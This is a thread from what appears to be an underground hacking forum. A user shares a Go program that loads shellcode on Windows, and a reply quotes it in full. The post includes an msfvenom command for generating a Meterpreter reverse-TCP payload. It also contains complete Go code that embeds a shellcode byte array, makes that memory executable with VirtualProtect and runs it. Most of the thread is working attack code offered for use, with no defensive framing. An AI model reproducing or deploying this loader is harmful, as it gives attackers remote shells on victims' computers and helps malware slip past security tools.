• XSS.stack #1 – первый литературный журнал от юзеров форума

golang shellcode loader (winApi)

Отслеживать
stars4

stars4

RAID-массив
Забанен
Регистрация
05.08.2023
Сообщения
70
Реакции
12
Пожалуйста, обратите внимание, что пользователь заблокирован
hello this is my basic shellcode loader writen in golang
for generate shellcode using msfvenom use this command --> msfvenom -p windows/meterpreter/reverse_tcp LHOST=LISTENER_IP LPORT=LISTENER_PORT -f go

Код: 
package main

import (
    "fmt"
    "unsafe"
    "syscall"
)

var  (
      kernel32       = syscall.MustLoadDLL("kernel32.dll")
      VirtualProtect = kernel32.MustFindProc("VirtualProtect")
)

func main() {
     old         := ""

     shellcode :=  []byte{0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,
     0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,
     0x31,0xff,0x0f,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xc0,0xac,
     0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
     0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
     0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,
     0x8b,0x58,0x20,0x50,0x01,0xd3,0x85,0xc9,0x74,0x3c,0x49,0x8b,
     0x34,0x8b,0x31,0xff,0x01,0xd6,0x31,0xc0,0xac,0xc1,0xcf,0x0d,
     0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
     0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,
     0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
     0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,
     0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,
     0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
     0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,
     0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,
     0x0a,0x00,0x02,0x02,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,
     0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
     0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
     0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,
     0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,
     0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,
     0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,
     0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
     0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,
     0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,
     0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,
     0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,
     0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
     0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5};
     _,_,e := VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&old)))
     fmt.Println(e)

     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}
 
stars4 сказал(а):
hello this is my basic shellcode loader writen in golang
for generate shellcode using msfvenom use this command --> msfvenom -p windows/meterpreter/reverse_tcp LHOST=LISTENER_IP LPORT=LISTENER_PORT -f go

Код: 
package main

import (
    "fmt"
    "unsafe"
    "syscall"
)

var  (
      kernel32       = syscall.MustLoadDLL("kernel32.dll")
      VirtualProtect = kernel32.MustFindProc("VirtualProtect")
)

func main() {
     old         := ""

     shellcode :=  []byte{0xfc,0xe8,0x8f,0x00,0x00,0x00,0x60,0x31,0xd2,
     0x89,0xe5,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,
     0x31,0xff,0x0f,0xb7,0x4a,0x26,0x8b,0x72,0x28,0x31,0xc0,0xac,
     0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0x49,
     0x75,0xef,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,
     0x8b,0x40,0x78,0x85,0xc0,0x74,0x4c,0x01,0xd0,0x8b,0x48,0x18,
     0x8b,0x58,0x20,0x50,0x01,0xd3,0x85,0xc9,0x74,0x3c,0x49,0x8b,
     0x34,0x8b,0x31,0xff,0x01,0xd6,0x31,0xc0,0xac,0xc1,0xcf,0x0d,
     0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,
     0x75,0xe0,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,
     0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,
     0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,
     0x5a,0x8b,0x12,0xe9,0x80,0xff,0xff,0xff,0x5d,0x68,0x33,0x32,
     0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
     0x07,0x89,0xe8,0xff,0xd0,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,
     0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x0a,0x68,
     0x0a,0x00,0x02,0x02,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x50,
     0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
     0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
     0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,
     0x67,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,
     0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,
     0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,
     0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,
     0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x28,
     0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,
     0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,
     0x5e,0x5e,0xff,0x0c,0x24,0x0f,0x85,0x70,0xff,0xff,0xff,0xe9,
     0x9b,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc1,0xc3,0xbb,
     0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5};
     _,_,e := VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&old)))
     fmt.Println(e)

     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}
loader
injector
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх